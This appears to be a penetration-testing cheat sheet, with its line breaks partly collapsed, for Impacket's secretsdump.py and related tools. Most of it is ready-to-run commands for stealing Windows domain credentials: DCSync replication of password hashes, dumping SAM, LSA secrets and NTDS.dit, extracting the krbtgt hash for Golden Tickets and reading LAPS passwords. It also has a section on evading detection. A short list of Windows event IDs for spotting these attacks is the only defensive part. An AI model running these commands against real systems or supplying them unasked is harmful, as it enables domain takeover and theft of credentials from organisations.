# DCSync - replicate credentials from DC (requires replication rights)secretsdump.py DOMAIN/user:pass@DC_IP -just-dc# Dump only NTLM hashes (faster)secretsdump.py DOMAIN/user:pass@DC_IP -just-dc-ntlm# Dump specific usersecretsdump.py DOMAIN/user:pass@DC_IP -just-dc-user Administrator# Include password historysecretsdump.py DOMAIN/user:pass@DC_IP -history
# Parse local registry hivessecretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL# Parse NTDS.ditsecretsdump.py -ntds ntds.dit -system SYSTEM LOCAL# With bootkeysecretsdump.py -sam SAM -system SYSTEM -bootkey BOOTKEY LOCAL
# Use Volume Shadow Copy (VSS) - no code executionsecretsdump.py DOMAIN/user:pass@target -use-vss# VSS for NTDS.dit on DCsecretsdump.py DOMAIN/user:pass@DC -use-vss -just-dc-ntlm
# Dump only SAM (skip LSA secrets)secretsdump.py domain/user:pass@target -skip-security# Dump only LSA secrets (skip SAM)secretsdump.py domain/user:pass@target -skip-sam# LDAP filter for specific userssecretsdump.py domain/user:pass@dc -ldapfilter "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=com)"# Skip specific userssecretsdump.py domain/user:pass@dc -skip-user "krbtgt,Guest"# Show password last set datessecretsdump.py domain/user:pass@dc -pwd-last-set# Show account status (enabled/disabled)secretsdump.py domain/user:pass@dc -user-status
Output Options
# Save to filesecretsdump.py domain/user:pass@target -outputfile credentials# Creates: credentials.ntds, credentials.sam, credentials.secrets# Resume interrupted dumpsecretsdump.py domain/user:pass@dc -resumefile resume.txt
Execution Methods
# Specify execution method for registry operationssecretsdump.py domain/user:pass@target -exec-method smbexecsecretsdump.py domain/user:pass@target -exec-method wmiexecsecretsdump.py domain/user:pass@target -exec-method mmcexec# Use remote VSS via WMI (no code execution)secretsdump.py domain/user:pass@target -use-remoteSSWMI
# 1. Dump all domain credentials from DCsecretsdump.py DOMAIN/DA:password@DC_IP -just-dc -outputfile domain_hashes# 2. Extract krbtgt for Golden Ticketsecretsdump.py DOMAIN/DA:password@DC_IP -just-dc-user krbtgt# 3. Dump with history for password analysissecretsdump.py DOMAIN/DA:password@DC_IP -history
# 1. Dump local SAMsecretsdump.py ./admin:password@WORKSTATION# 2. Extract cached domain credentialssecretsdump.py DOMAIN/admin@WORKSTATION -hashes :HASH# 3. Get LSA secrets (auto-logon passwords, service accounts)secretsdump.py ./admin@WORKSTATION -hashes :HASH
# 1. Extract hives with reg.py or other methodsreg.py domain/user:pass@target save -keyName HKLM\SAM sam.savereg.py domain/user:pass@target save -keyName HKLM\SYSTEM system.savereg.py domain/user:pass@target save -keyName HKLM\SECURITY security.save# 2. Parse offlinesecretsdump.py -sam sam.save -system system.save -security security.save LOCAL
# Get LAPS password for specific computerGetLAPSPassword.py DOMAIN/user:password@DC -computer WIN10-PC01# Get all LAPS passwords (requires read permissions)GetLAPSPassword.py DOMAIN/user:password@DC# Kerberos authenticationGetLAPSPassword.py DOMAIN/user@DC -k -no-pass -computer TARGET$
Event ID 4688: Process creation (reg.exe, vssadmin.exe)
Event ID 4663: Registry access to SAM/SECURITY/SYSTEM
Event ID 5145: Network share access (ADMIN,C)
Event ID 4662: Directory Service Access (DCSync)
Event ID 4624/4672: Privileged logon
Network Indicators
SMB connections to ADMIN/C shares
RPC calls to SAMR/DRSUAPI
Registry service activation
Volume Shadow Copy creation
Evasion Techniques
# Use VSS method (less suspicious than remote registry)secretsdump.py domain/user:pass@target -use-vss# Use Kerberos instead of NTLMsecretsdump.py domain/user:pass@target -k -dc-ip DC# Limit scope to avoid mass dumping alertssecretsdump.py domain/user:pass@dc -just-dc-user specific_user# Use legitimate backup accountsecretsdump.py DOMAIN/backup_admin:pass@target
# Verify admin accesscrackmapexec smb target -u user -p password# Check for local adminsmbmap -H target -u user -p password# For DCSync, verify replication rights# User needs "Replicating Directory Changes" and # "Replicating Directory Changes All" permissions
Remote Registry Service
# secretsdump.py starts RemoteRegistry automatically# If it fails, check:# 1. Service permissionsservices.py domain/user:pass@target list# 2. Try VSS method insteadsecretsdump.py domain/user:pass@target -use-vss# 3. Use different execution methodsecretsdump.py domain/user:pass@target -exec-method wmiexec
DCSync Errors
# Error: "The user has insufficient access rights"# Solution: User needs replication permissions# Check current user's group membershipsGetADUsers.py domain/user:pass@dc -user current_user# Alternative: Use domain admin or backup operator accountsecretsdump.py DOMAIN/Administrator:pass@dc -just-dc